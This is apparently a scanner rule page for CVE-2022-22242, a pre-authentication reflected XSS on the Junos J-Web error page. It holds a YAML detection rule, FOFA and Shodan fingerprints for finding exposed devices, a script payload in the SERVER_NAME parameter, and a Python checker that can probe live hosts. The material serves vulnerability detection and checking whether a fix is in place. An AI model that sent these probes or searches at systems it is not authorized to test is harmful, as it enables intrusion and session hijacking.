Vulnerability description
CVE-2022-22242 is a pre-authentication reflected XSS vulnerability on the J-Web error page (error.php). A remote attacker can use it to hijack a Junos OS administrator's session and chain it with other vulnerabilities that require authentication.
FOFA: icon_hash="1167011145"
SHODAN: title:"Juniper Web Device Manager"
id: CVE-2022-22242
info:
  name: Juniper Networks Junos OS Error Page Reflected XSS
  author: daffainfo,EvergreenCartoons
  severity: medium
  verified: true
  description: |
    CVE-2022-22242 is a pre-authentication reflected XSS vulnerability on the J-Web error page (error.php). A remote attacker can use it to hijack a Junos OS administrator's session and chain it with other vulnerabilities that require authentication.
    FOFA: icon_hash="1167011145"
    SHODAN: title:"Juniper Web Device Manager"
  reference:
    - https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/
    - https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-Multiple-vulnerabilities-in-J-Web?language=en_US
    - https://kb.juniper.net/JSA69899
    - https://nvd.nist.gov/vuln/detail/CVE-2022-22242
  tags: cve,cve2022,xss,juniper,junos
  created: 2023/06/22
rules:
  r0:
    request:
      method: GET
      # SERVER_NAME is echoed into the error page without HTML encoding on vulnerable builds
      path: /error.php?SERVER_NAME=<script>alert(document.domain)</script>
    # Match only when the payload comes back verbatim (not entity-encoded) inside the
    # HTML error page; a patched device returns &lt;script&gt;... and does not match.
    expression: |
      response.status == 200 &&
      response.body.bcontains(b"<script>alert(document.domain)</script>") &&
      response.body.bcontains(b"The requested resource is not authorized to view") &&
      response.raw_header.bcontains(b"text/html")
expression: r0()
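The rule above can only be run through xray itself. The following Python script is an added example (not part of the original page, nor code from the xray or nuclei projects) that reproduces the same match logic so it can be checked offline and, optionally, sent to a host you are authorized to test. The two sample response bodies are constructed by hand to show the difference between a vulnerable device (payload reflected raw) and a fixed one (payload entity-encoded); they are not captured from a real Junos device. Unlike the rule, the script percent-encodes the payload in the query string, which is what a browser would send and which the server decodes before reflecting it.

```python
"""Offline model of the CVE-2022-22242 reflected-XSS check from the xray rule.

Added example, not part of the original page or of xray/nuclei.
Sample responses are constructed, not captured from a real device.
"""
import urllib.error
import urllib.request
from html import escape
from urllib.parse import quote

PAYLOAD = "<script>alert(document.domain)</script>"
# Same probe as the xray rule; the payload is URL-encoded as a browser would send it.
PATH = "/error.php?SERVER_NAME=" + quote(PAYLOAD, safe="")
MARKER = "The requested resource is not authorized to view"


def is_vulnerable(status: int, headers: dict, body: str) -> bool:
    """Mirror the rule's expression: HTTP 200, HTML content type, the error-page
    marker string, and the payload reflected back without HTML encoding."""
    lowered = {k.lower(): v for k, v in headers.items()}
    content_type = lowered.get("content-type", "").lower()
    return (
        status == 200
        and "text/html" in content_type
        and MARKER in body
        and PAYLOAD in body
    )


def reflection_state(body: str) -> str:
    """Classify how SERVER_NAME was echoed: 'raw' (exploitable),
    'encoded' (fixed: '<' became '&lt;'), or 'absent' (not reflected)."""
    if PAYLOAD in body:
        return "raw"
    if escape(PAYLOAD) in body:
        return "encoded"
    return "absent"


# Constructed sample responses (hypothetical, not real Junos output).
VULNERABLE_BODY = (
    "<html><body><h1>Error</h1>"
    "The requested resource is not authorized to view on "
    + PAYLOAD + "</body></html>"
)
PATCHED_BODY = (
    "<html><body><h1>Error</h1>"
    "The requested resource is not authorized to view on "
    + escape(PAYLOAD) + "</body></html>"
)
HTML_HEADERS = {"Content-Type": "text/html; charset=utf-8"}


def check_live(base_url: str, timeout: float = 5.0) -> bool:
    """Send the probe to base_url (e.g. https://target) and apply the same logic.
    Only run this against systems you are authorized to test."""
    req = urllib.request.Request(
        base_url.rstrip("/") + PATH,
        headers={"User-Agent": "cve-2022-22242-check"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", errors="replace")
            return is_vulnerable(resp.status, dict(resp.headers), body)
    except urllib.error.HTTPError as e:
        # error.php may legitimately answer with a non-200 code; evaluate it anyway.
        body = e.read().decode("utf-8", errors="replace")
        return is_vulnerable(e.code, dict(e.headers), body)


if __name__ == "__main__":
    print("vulnerable sample:", is_vulnerable(200, HTML_HEADERS, VULNERABLE_BODY))
    print("patched sample:", is_vulnerable(200, HTML_HEADERS, PATCHED_BODY))
    print("patched reflection:", reflection_state(PATCHED_BODY))
```

The `reflection_state` helper is the check worth keeping after remediation: a device that still echoes `SERVER_NAME` but now returns `&lt;script&gt;` is fixed, while `raw` means the fix is not in place regardless of what the status code says.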